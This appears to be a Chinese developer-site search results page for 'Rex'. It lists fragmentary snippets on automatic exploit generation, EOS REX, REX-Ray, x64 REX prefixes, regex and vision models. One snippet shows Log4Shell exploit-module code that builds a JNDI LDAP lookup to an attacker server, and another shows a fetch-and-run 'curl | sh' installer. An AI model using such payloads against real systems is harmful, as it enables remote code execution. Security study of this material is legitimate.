- 综合排序
- 最热优先
- 最新优先
- 来自专栏FreeBuf
Exploit自动生成引擎:Rex
本文主要对其中的 Exploit 自动生成引擎 Rex 进行介绍,通过分析 Rex 源码,重点对 Crash 复现及可利用判断部分进行说明。 二、安装 安装 Rex 存在两种方式:1)安装 Mechaphish,安装文档;2)仅安装 Rex,安装文档。 由于各模块之间相互独立,因此本文选择仅安装自动利用模块 Rex。本地环境采用 Ubuntu 16.04.5 Desktop(64 bit)。部署过程中,Rex 所需依赖如下: ? 安装完成后,使用以下代码对 Rex 的功能进行测试。 # triage a crash >>> crash = rex.Crash(". 三、源码分析 查看 Rex 源码的目录结构: ?
1.5K40发布于 2019-09-17 - 来自专栏醒者呆
REX:EOS资源租赁平台详解
REX介绍 按照设计思路,REX是链上的主币持有者参与的一个CPU和网络资源租赁市场,参与者可以通过买卖REX池中的REX币来借出或收回他们的现有资源。 [official PR] REX实现 本节通过以下12个方面介绍REX实现的详细逻辑。 (一)用户REX基金 要想得到REX的相关操作,用户需要首先创建一个REX基金,并且使用主币向该基金充值。 total_rex,表示该账户所有的REX币总量,取决于买卖REX动作的交易量。任何时候,账户的REX币余额都指的是total_lendable除以total_rex。 (五)REX成熟期 购买REX后的卖出限制是4天,也就是说4天以后才可以卖出你的REX币。 余额,减去卖出的REX数量,rex_balance -= rex_requested,然后设置vote_stake为当前rex_balance的值,rex_pool的余额也相应改变。
3.3K00发布于 2019-04-18 - 来自专栏zhaotingrui
Rex-Ray配置VirtualBox backend
【1】Installation REX-Ray curl -sSL https://rexray.io/install | sh - 官网:https://github.com/rexray/rexray 【2】然后创建并编辑 REX-Ray 的配置文件 /etc/rexray/config.yml libstorage: service: virtualbox virtualbox: endpoint IDE存储介质,保留SATA存储介质 3.设置SATAcontroller 的 port 数量的最大值 为 30 【6】开启master和docker1, 运行rexray volume ls 测试 Rex-Ray
75830发布于 2019-09-16 - 来自专栏FreeBuf
Rex:栈溢出之Exploit自动生成
Rex是由Shellphish开发的自动化漏洞利用引擎,设计初衷在于参加Cyber Grand Challenge。本文以栈溢出为例,展示Rex自动生成 Exploit的能力。 测试样例为Linux下可执行程序vuln_stacksmash,其中存在栈溢出漏洞,通过Rex自动生成rop2system、rop2text、jmpesp三种Exploit。 上文简要分析了vuln_stacksmash中存在的栈溢出漏洞,下文将介绍如何利用Rex自动生成Exploit。 0x01 Rex脚本 Rex的实现基于Angr,主要采用混合符号执行技术,对原理感兴趣的同学可以阅读论文《(State of) The Art of War: Offensive Techniques 0x06 小结 通过学习Rex源码以及混合符号执行,成功对栈溢出漏洞生成Exploit。文中所针对的漏洞非常简单,且未涉及ASLR等安全机制的绕过。
1.3K20发布于 2019-03-08 - 来自专栏eosfans
eos源码赏析(二十五):管中窥“Rex”(上)
那么,我们来结合代码看看,Rex的雏形是什么样的,有人租赁定然有人出租,出租者将一定金额的EOS代币抵押到Rex基金账户,如下: /** * @brief 充值eos代币到Rex基金账户 = add_to_rex_pool(amount); const asset delta_rex_stake = add_to_rex_balance(from, amount, , payment, "buy REX with staked tokens" }); const asset rex_received = add_to_rex_pool(payment 资源之前必须在Rex基金中抵押一部分代币,且本次操作获取到的Rex资源对应的EOS代币的量不能大于在Rex基金中抵押的EOS代币的金额,这些判断完成之后对Rex基金账户进行相应的操作,即减掉相应的金额。 Rex和正常的购买Rex有什么区别呢,用户如何来出售Rex资源呢?
68530发布于 2021-11-23 - 来自专栏HHTjim'S 部落格
T-Rex 在线版本的chrome离线恐龙游戏
T-Rex 在线版本的chrome离线恐龙游戏 作者:matrix 被围观: 4,556 次 发布时间:2017-02-15 分类:零零星星 | 3 条评论 » 这是一个创建于 2023 天前的主题 断网的时候chrome中会出现恐龙小游戏T-Rex/Dino。 www.hhtjim.com/wp-content/uploads/2017/02/T-RexGame.html 参考:http://www.thecodepost.org/internet/play-hidden-T-Rex-game-offline-chrome
76510编辑于 2022-09-26 - 来自专栏星河造梦坊专栏
Git Bash☀️三、解决ANOMALY: use of REX.w is meaningless (default operand size is 64)
如果大家看了我前面两节的gitbash教程,相信也看到了有这个报错: ANOMALY: use of REX.w is meaningless (default operand size is 64)
1.2K10编辑于 2024-08-15 - 来自专栏前端领域
还不会正则表达式? 放心 我会出手(万字教学)
(rex.test(' x')); \t 表示匹配一个tab字符,字符串里面需要至少一个tab字符, let rex = /\t/; //两个空格 console.log(rex.test( let rex = /^\d+$/; console.log(rex.test('')); false console.log(rex.test('123')); true ? let rex = /\d? (rex.exec('123')); let rex = /es(? let rex = /\d{1}/y console.log(rex.exec('123')); console.log(rex.exec('1g2g3')); console.log(rex.exec
98510编辑于 2022-11-28 - 来自专栏Triciaの小世界
【问题记录】ANOMALY: use of REX.w is meaningless (default operand size is 64)导致git命令无法使用
出现这个记录可能的原因就是电脑被安装了某种监控软件 可以使用如下命令检测电脑是否被安装
3K20编辑于 2023-04-12 - 来自专栏机器之心
IDEA提出Rex-Thinker:基于思维链的指代物体检测模型,准确率+可解释性双突破
决策 (Summarization)汇总验证结果,输出匹配目标的坐标或声明 “未找到” 图 2: Rex-Thinker 推理示例 模型结构:基于检索的检测多模态模型设计 + CoT 推理 图 3: Rex-Thinker Rex-Thinker 在 GRPO 后训练后泛化到任意物体 实验结果: SFT 赋予模型 CoT 能力, GRPO 提升模型泛化能力 在 HumanRef Benchmark 上,Rex-Thinker 团队测试了三种模型版本: Rex-Thinker-Plain:只训练最终检测结果,没有推理监督; Rex-Thinker-CoT:加入思维链(CoT)监督,学会 “如何思考”; Rex-Thinker-GRPO 表 2 Rex-Thinker 在 RefCOCOg 数据集上的泛化结果 此外,在 RefCOCOg 数据集上的跨类别评估中,Rex-Thinker 同样表现出良好的迁移能力。 可视化结果 我们接下来展示一下 Rex-Thinker 的推理过程可视化,包括、每一步条件验证及最终决策输出。
38410编辑于 2025-07-02 - 来自专栏量子位
亚洲高校首现KDD博士论文奖:清华裘捷中获Runner Up奖,WINNER奖也是位华人
转载自 AMiner KDD2022博士论文奖,来自斯坦福大学的Rex Ying(应智韬)获得博士论文奖WINNER奖,清华大学裘捷中获得Runner Up 奖 。 WINNER奖- Rex Ying(应智韬) Rex Ying 目前是美国耶鲁大学计算机系的助理教授,kumo.ai创始工程师,于2022年1月获得斯坦福大学计算机系博士学位,导师是Jure Leskovec Rex在社交网络,推荐系统,生物计算,物理模拟等应用场景中设计并落地图学习算法;他的框架在Pinterest,Amazon等多家公司被应用和部署。 Rex是LoG 2022的领域主席,并且在KDD, ICML, ICLR, NeurIPS等多个会议举办图学习以及应用的Workshop和竞赛。 除了Rex Ying和裘捷中获得第一名、第二名之外,按照博士论文奖规则,来自慕尼黑工业大学的 Daniel Zügner 博士排名第三。
75920编辑于 2022-08-26 - 来自专栏Eureka的技术时光轴
X64汇编之指令格式解析
REX prefix 仅存在于 x64 的 64-bit 模式中,在 legacy x86 模式下,REX prefix 是无效的,但是在 x64 的 64-bit 模式下 Legacy prefix REX prefix 的取值范围是:40H - 4FH。 REX.W + 8B /r MOV r64,r/m64 RM Valid N.E. Move r/m64 to r64. 其实Inter手册已经告诉你了要加REX Prefix。 发现跟结果不一样,为什么呢,REX Prefix没写对,其实这是因为 /r 指示ModR/M中存在扩展寄存器,所以REX.R = 1,这条指令的 ModRM.reg 提供源操作数寻址,而 ModRM.r /m 提供目标操作数寻址,目标寄存器 r8 需要 REX.B 进行扩展,它的指令编码是: ?
4.7K30发布于 2019-07-24 - 来自专栏老Z的博客
正则表达式之正向预查(?=...)
这个问题用常规的字符函数可能要多行才能解决,用正则表达式就相对简单了,程序如下: data demo; STRING='%test(var1=123, var2=abc, var3=abc123);'; REX [,\)])/'); START=1; STOP=length(STRING); call prxnext(REX, START, STOP, STRING, POSITION, PARAM)+2); VALUE=prxchange('s/[\),]$//', -1, cats(VALUE)); output; call prxnext(REX =[^\(]*\)[,\)])/~/', -1, STRING); REX=prxparse('/(\w+=.+? [,\)]+)/'); START=1; STOP=length(STRING); call prxnext(REX, START, STOP, STRING, POSITION
1.2K20发布于 2020-07-15 IDEA研究院发布Rex-Omni:3B参数MLLM重塑目标检测,零样本性能超越DINO
via Next Point Prediction论文链接:https://arxiv.org/abs/2510.12798代码仓库:https://github.com/idea-research/rex-omni 突破传统:从坐标回归到点预测Rex-Omni的核心创新在于彻底改变了目标检测的问题定义。 这种设计带来双重优势:降低学习难度:连续的坐标回归简化为有限集合的分类问题提升推理效率:相比将坐标拆解为单个数字的方法,token使用效率大幅提升三大支柱:架构创新的坚实基础Rex-Omni的成功建立在三大核心设计之上 多任务能力:超越传统检测的边界得益于语言模型的底层架构,Rex-Omni展现出全面的视觉感知能力:指代性物体检测视觉提示理解GUI界面定位OCR文字识别关键点检测这种统一的方法为开发通用视觉感知系统开辟了新路径 技术启示与未来展望Rex-Omni的突破表明,通过巧妙的任务重构,MLLM不仅能够“理解”图像内容,更能“精准定位”视觉元素。
66910编辑于 2025-10-22- 来自专栏老Z的博客
SAS删除字符串中的重复项
.; REX1=prxparse('s/([a-z].+?\.\s+)(.*?)(\1+)/\2\3/i'); REX2=prxparse('/([a-z].+?\.\s+)(.*?) (\1+)/i'); do i=1 to 100; STRING=prxchange(REX1, -1, compbl(STRING)); if not prxmatch (REX2, compbl(STRING)) then leave; end; put STRING=; cards; a. (\b\1+\b)/\2\3/i'); REX2=prxparse('/(\b\w+\b)(.*?) (\b\1+\b)/i'); do i=1 to 100; STRING=prxchange(REX1, -1, compbl(STRING)); if not
7.8K20发布于 2020-07-15 - 来自专栏Khan安全团队
Microsoft Exchange Server 远程代码执行
view=exchserver-2019 [ [Rex::Version.new('15.1.2308.8'), Rex::Version.new('15.1.2308.20')], # Exchange Server 2016 CU21 [Rex::Version.new('15.1.2375.7'), Rex::Version.new('15.1.2375.17') ], # Exchange Server 2016 CU22 [Rex::Version.new('15.2.922.7'), Rex::Version.new('15.2.922.19') ], # Exchange Server 2019 CU10 [Rex::Version.new('15.2.986.5'), Rex::Version.new('15.2.986.14') { |build_range| Rex::Version.new(build).between?
1.3K40编辑于 2022-03-09 - 来自专栏Khan安全团队
Log4Shell HTTP 标头注入
super end def jndi_string "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex ::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}" end def resource_url_string response and then send it # def send_response(cli, code, message = 'OK', html = '') proto = Rex ::Proto::Http::DefaultProtocol res = Rex::Proto::Http::Response.new(code, message, proto) res uopts['Path']}") if (opts['ServerHost'] == '0.0.0.0') print_status(" Local IP: #{proto}://#{Rex
1.6K10编辑于 2022-01-14 - 来自专栏Python爬虫与数据挖掘
使用Python实现读取TXT小说文件按每一回显示打印出来
并且指出: 改进后的代码如下所示: import re with open('西游记.txt', 'r+', encoding='utf-8') as f: txt = f.read() rex1 \n\n\n' rex2 = r'《》目录 (第一百回.*?《西游记》至此终。)' result = re.findall(rex1, txt, re.S) temp = re.findall(rex2, txt, re.S) result += temp # print(len(result
84130编辑于 2022-11-14 - 来自专栏浪淘沙
java学习day08 集合
System.out.println("18235195192".matches("^1([3,5,7,8][0-9]|5[189]|8[6789])[0-9]{8}$")); (2) String rex = "[1-9][0-9]{4,14}"; Pattern p = Pattern.compile(rex); //生产规则 Matcher m = p.matcher(qq); //进行匹配 return m.find(); (3) String rex = "[1-9]{3}"; Pattern p = Pattern.compile(rex);
34640发布于 2018-10-18 - 来自专栏巡天遥看一千河
从hook的并发症理解x64指令格式
最基础的 指令结构是这样的: [image] 不过现在我们基本都进入64位了,新增了64位的 rex 前缀 扩展,当然 rex prefix 是可选的 不一定有 [image] 我们来具体的看一下 其中的每个部分 这就是 REX prefix。 REX prefix 的具体格式及含义 REX prefix的取值范围是:40 ~ 4F(0100 0000 ~ 0100 1111),来看下原来opcode取值范围的40 ~ 4F的是什么指令: Opcode [image] 如上表: REX.W域是设定操作数的大小(Operand-Size),当REX.W为1时,操作数是64位,为0时,操作数的大小是缺省大小(Default Opeand-Size)。 REX.R将原来3位的寄存器ID(000 ~ 111)扩展为4位(0000 ~ 1111),这就解决了访新增寄存器的问题。
1.9K90发布于 2020-11-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号